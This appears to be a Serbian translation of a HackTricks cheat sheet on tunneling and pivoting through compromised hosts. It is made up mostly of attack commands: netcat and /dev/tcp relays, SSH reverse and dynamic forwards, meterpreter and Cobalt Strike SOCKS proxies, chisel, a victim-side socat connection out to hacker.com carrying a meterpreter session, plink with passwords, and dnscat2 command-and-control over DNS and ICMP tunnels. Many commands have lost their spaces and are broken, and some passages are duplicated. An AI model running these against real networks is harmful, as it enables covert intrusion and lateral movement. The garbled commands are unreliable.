Da li radite u kompaniji za kibernetičku bezbednost? Želite li da vidite svoju kompaniju reklamiranu na HackTricks? ili želite pristupiti najnovijoj verziji PEASS-a ili preuzeti HackTricks u PDF-u? Proverite PLANOVE ZA PRIJAVU!
ICMP i SYN skenovi ne mogu biti tunelovani kroz socks proxy, stoga moramo onemogućiti otkrivanje pinga (-Pn) i specificirati TCP skenove (-sT) da bi ovo radilo.
Bash
Host -> Skok -> InterniA -> InterniB
# On the jump server connect the port 3333 to the 5985mknodbackpipep;nc-lvnp59850<backpipe|nc-lvnp33331>backpipe# On InternalA accessible from Jump and can access InternalB## Expose port 3333 and connect it to the winrm port of InternalBexec3<>/dev/tcp/internalB/5985exec4<>/dev/tcp/Jump/3333cat<&3>&4&cat<&4>&3&# From the host, you can now access InternalB from the Jump serverevil-winrm-uusername-iJump
SSH
Grafička SSH veza (X)
ssh-Y-C<user>@<ip>#-Y is less secure but faster than -X
Lokalno preusmeravanje porta
Otvorite novi port na SSH serveru --> Drugi port
ssh-R0.0.0.0:10521:127.0.0.1:1521user@10.0.0.1#Local port 1521 accessible in port 10521 from everywhere
ssh-R0.0.0.0:10521:10.0.0.1:1521user@10.0.0.1#Remote port 1521 accessible in port 10521 from everywhere
Port2Port
Lokalni port --> Kompromitovani host (SSH) --> Treća_kutija:Port
ssh -i ssh_key <user>@<ip_compromised> -L <attacker_port>:<ip_victim>:<remote_port> [-p <ssh_port>] [-N -f] #This way the terminal is still in your host
#Examplesudossh-L631:<ip_victim>:631-N-f-l<username><ip_compromised>
Port2hostnet (proxychains)
Lokalni port --> Kompromitovani host (SSH) --> Gde god
ssh -f -N -D <attacker_port> <username>@<ip_compromised> #All sent to local port will exit through the compromised server (use as proxy)
Obrnuto prosleđivanje porta
Ovo je korisno za dobijanje obrnutih ljuski sa internih domaćina preko DMZ-a do vašeg domaćina:
ssh-idmz_key-R<dmz_internal_ip>:443:0.0.0.0:7000root@10.129.203.111-vN# Now you can send a rev to dmz_internal_ip:443 and caputure it in localhost:7000# Note that port 443 must be open# Also, remmeber to edit the /etc/ssh/sshd_config file on Ubuntu systems# and change the line "GatewayPorts no" to "GatewayPorts yes"# to be able to make ssh listen in non internal interfaces in the victim (443 in this case)
VPN-Tunel
Potrebno je root u oba uređaja (jer ćete kreirati nove interfejse) i sshd konfiguracija mora dozvoliti root prijavljivanje:
PermitRootLogin yesPermitTunnel yes
sshroot@server-wany:any#This will create Tun interfaces in both devicesipaddradd1.1.1.2/32peer1.1.1.1devtun0#Client side VPN IPifconfigtun0up#Activate the client side network interfaceipaddradd1.1.1.1/32peer1.1.1.2devtun0#Server side VPN IPifconfigtun0up#Activate the server side network interface
Lokalni port --> Kompromitovani host (aktivna sesija) --> Treća_kutija:Port
# Inside a meterpreter sessionportfwdadd-l<attacker_port>-p<Remote_port>-r<Remote_host>
SOCKS
SOCKS (Socket Secure) je protokol koji omogućava rutiranje mrežnog saobraćaja između klijenta i servera putem proxy servera. SOCKS koristi port 1080 i može biti korišćen za tuneliranje različitih vrsta mrežnog saobraćaja, uključujući TCP i UDP.
background#meterpretersessionrouteadd<IP_victim><Netmask><Session># (ex: route add 10.10.10.14 255.255.255.0 8)useauxiliary/server/socks_proxyrun#Proxy port 1080 by defaultecho"socks4 127.0.0.1 1080">/etc/proxychains.conf#Proxychains
Drugi način:
background#meterpreter sessionusepost/multi/manage/autoroutesetSESSION<session_n>setSUBNET<New_net_ip>#Ex: set SUBNET 10.1.13.0setNETMASK<Netmask>runuseauxiliary/server/socks_proxysetVERSION4arun#Proxy port 1080 by defaultecho"socks4 127.0.0.1 1080">/etc/proxychains.conf#Proxychains
Cobalt Strike
SOCKS proxy
Otvorite port u tim serveru koji sluša na svim interfejsima i može se koristiti za usmeravanje saobraćaja kroz beacon.
beacon>socks1080[+] started SOCKS4a server on: 1080# Set port 1080 as proxy server in proxychains.confproxychainsnmap-n-Pn-sT-p445,3389,598510.10.17.25
rPort2Port
U ovom slučaju, port je otvoren na hostu zastavici, a ne na Tim Serveru i saobraćaj se šalje na Tim Server, a odatle ka naznačenom hostu:port
U ovom slučaju, port je otvoren na hostu Beacon-a, a ne na Team Server-u i saobraćaj je poslat ka Cobalt Strike klijentu (ne ka Team Server-u) i odatle ka naznačenom hostu:port.
./chiselserver-p8080--reverse#Server -- Attacker./chisel-x64.execlient10.10.14.3:8080R:socks#Client -- Victim#And now you can use proxychains with port 1080 (default)./chiselserver-v-p8080--socks5#Server -- Victim (needs to have port 8080 exposed)./chiselclient-v10.10.10.10:8080socks#Attacker
#Create meterpreter backdoor to port 3333 and start msfconsole listener in that portattacker>socatOPENSSL-LISTEN:443,cert=server.pem,cafile=client.crt,reuseaddr,fork,verify=1TCP:127.0.0.1:3333
victim> socat.exe TCP-LISTEN:2222 OPENSSL,verify=1,cert=client.pem,cafile=server.crt,connect-timeout=5|TCP:hacker.com:443,connect-timeout=5
#Execute the meterpreter
Možete zaobići neovlašćeni proxy izvršavanjem ove linije umesto poslednje u konzoli žrtve:
Kreirajte sertifikate na obe strane: Klijentu i Serveru
# Execute these commands on both sidesFILENAME=socatsslopensslgenrsa-out $FILENAME.key1024opensslreq-new-key $FILENAME.key-x509-days3653-out $FILENAME.crtcat $FILENAME.key $FILENAME.crt>$FILENAME.pemchmod600 $FILENAME.key $FILENAME.pem
Povežite lokalni SSH port (22) sa 443 portom napadačkog hosta
attacker> sudo socat TCP4-LISTEN:443,reuseaddr,fork TCP4-LISTEN:2222,reuseaddr #Redirect port 2222 to port 443 in localhost
victim> while true; do socat TCP4:<attacker>:443 TCP4:127.0.0.1:22 ; done # Establish connection with the port 443 of the attacker and everything that comes from here is redirected to port 22
attacker>sshlocalhost-p2222-lwww-data-ivulnerable#Connects to the ssh of the victim
Plink.exe
To je kao konzolna verzija PuTTY-a (opcije su vrlo slične ssh klijentu).
Pošto će se ovaj binarni fajl izvršiti na žrtvi i to je ssh klijent, moramo otvoriti naš ssh servis i port kako bismo imali reverznu konekciju. Zatim, da bismo prosledili samo lokalno dostupan port na port našeg računara:
echo y | plink.exe -l <Our_valid_username> -pw <valid_password> [-p <port>] -R <port_ in_our_host>:<next_ip>:<final_port> <your_ip>
echoy|plink.exe-lroot-pwpassword [-p 2222]-R9090:127.0.0.1:909010.11.0.41#Local port 9090 to out port 9090
Windows netsh
Port2Port
Morate biti lokalni administrator (za bilo koji port)
netshinterfaceportproxyaddv4tov4listenaddress=listenport=connectaddress=connectport=protocol=tcp# Example:netshinterfaceportproxyaddv4tov4listenaddress=0.0.0.0listenport=4444connectaddress=10.10.10.10connectport=4444# Check the port forward was created:netshinterfaceportproxyshowv4tov4# Delete port forwardnetshinterfaceportproxydeletev4tov4listenaddress=0.0.0.0listenport=4444
SocksOverRDP & Proxifier
Potrebno je da imate RDP pristup sistemu.
Preuzmite:
SocksOverRDP x64 Binaries - Ovaj alat koristi Dynamic Virtual Channels (DVC) funkciju Remote Desktop Service opcije Windows-a. DVC je odgovoran za tuneliranje paketa preko RDP veze.
Na vašem klijentskom računaru učitajte SocksOverRDP-Plugin.dll na sledeći način:
# Load SocksOverRDP.dll using regsvr32.exeC:\SocksOverRDP-x64>regsvr32.exeSocksOverRDP-Plugin.dll
Sada možemo povezati se sa žrtvom preko RDP koristeći mstsc.exe, i trebali bismo dobiti prozor koji kaže da je SocksOverRDP dodatak omogućen, i da će slušati na 127.0.0.1:1080.
Povežite se preko RDP i otpremite i izvršite na mašini žrtve binarni fajl SocksOverRDP-Server.exe:
C:\SocksOverRDP-x64> SocksOverRDP-Server.exe
Sada potvrdite na vašem računaru (napadaču) da li port 1080 osluškuje:
netstat -antb | findstr 1080
Sada možete koristiti Proxifierda biste usmjerili saobraćaj kroz taj port.
Proksifikuj Windows GUI aplikacije
Možete omogućiti Windows GUI aplikacijama da koriste proxy korišćenjem Proxifier.
U Profile -> Proxy Servers dodajte IP adresu i port SOCKS servera.
U Profile -> Proxification Rules dodajte ime programa za proksifikaciju i veze ka IP adresama koje želite da proksifikujete.
NTLM zaobilaženje proxy-ja
Prethodno pomenuti alat: RpivotOpenVPN takođe može da ga zaobiđe, podešavanjem ovih opcija u konfiguracionom fajlu:
Autentikuje se protiv proksi servera i vezuje lokalni port koji se prosleđuje ka spoljnoj usluzi koju odredite. Zatim, možete koristiti alat po vašem izboru preko ovog porta.
Na primer, prosleđuje port 443
Username Alice
Password P@ssw0rd
Domain CONTOSO.COM
Proxy 10.0.0.10:8080
Tunnel 2222:<attackers_machine>:443
Sada, ako postavite na primer na žrtvi SSH servis da sluša na portu 443. Možete se povezati na njega preko napadačevog porta 2222.
Takođe možete koristiti meterpreter koji se povezuje na localhost:443 dok napadač sluša na portu 2222.
Uspostavlja C&C kanal preko DNS-a. Ne zahteva root privilegije.
attacker>ruby./dnscat2.rbtunneldomain.comvictim>./dnscat2tunneldomain.com# If using it in an internal network for a CTF:attacker>rubydnscat2.rb--dnshost=10.10.10.10,port=53,domain=mydomain.local--no-cachevictim>./dnscat2--dnshost=10.10.10.10,port=5353
U PowerShell-u
Možete koristiti dnscat2-powershell da pokrenete dnscat2 klijenta u PowerShell-u:
session-i<sessions_id>listen [lhost:]lport rhost:rport #Ex: listen 127.0.0.1:8080 10.0.0.20:80, this bind 8080port in attacker host
Promena proxychains DNS
Proxychains presreće gethostbyname libc poziv i tuneliše tcp DNS zahtev kroz socks proxy. Podrazumevano, DNS server koji proxychains koristi je 4.2.2.2 (hardkodiran). Da biste ga promenili, izmenite fajl: /usr/lib/proxychains3/proxyresolv i promenite IP adresu. Ako se nalazite u Windows okruženju, možete postaviti IP adresu kontrolera domena.
Potreban je root na oba sistema kako bi se kreirali tun adapteri i tunelovali podaci između njih koristeći ICMP echo zahteve.
./hans-v-f-s1.1.1.1-pP@ssw0rd#Start listening (1.1.1.1 is IP of the new vpn connection)./hans-f-c<server_ip>-pP@ssw0rd-vping1.1.1.100#After a successful connection, the victim will be in the 1.1.1.100
# Generate itsudo./autogen.sh# Server -- victim (needs to be able to receive ICMP)sudoptunnel-ng# Client - Attackersudoptunnel-ng-p<server_ip>-l<listen_port>-r<dest_ip>-R<dest_port># Try to connect with SSH through ICMP tunnelssh-p2222-luser127.0.0.1# Create a socks proxy through the SSH connection through the ICMP tunnelssh-D9050-p2222-luser127.0.0.1
ngrok
ngrok je alatka za izlaganje rešenja na internetu jednom komandom.URI za izlaganje su poput:UID.ngrok.io
Instalacija
Napravite nalog: https://ngrok.com/signup
Preuzimanje klijenta:
tar xvzf ~/Downloads/ngrok-v3-stable-linux-amd64.tgz -C /usr/local/bin
chmod a+x ./ngrok
# Init configuration, with your token
./ngrok config edit
Da li radite u kompaniji za kibernetičku bezbednost? Želite li da vidite svoju kompaniju reklamiranu na HackTricks? ili želite da imate pristup najnovijoj verziji PEASS-a ili preuzmete HackTricks u PDF formatu? Proverite PLANOVE ZA PRIJAVU!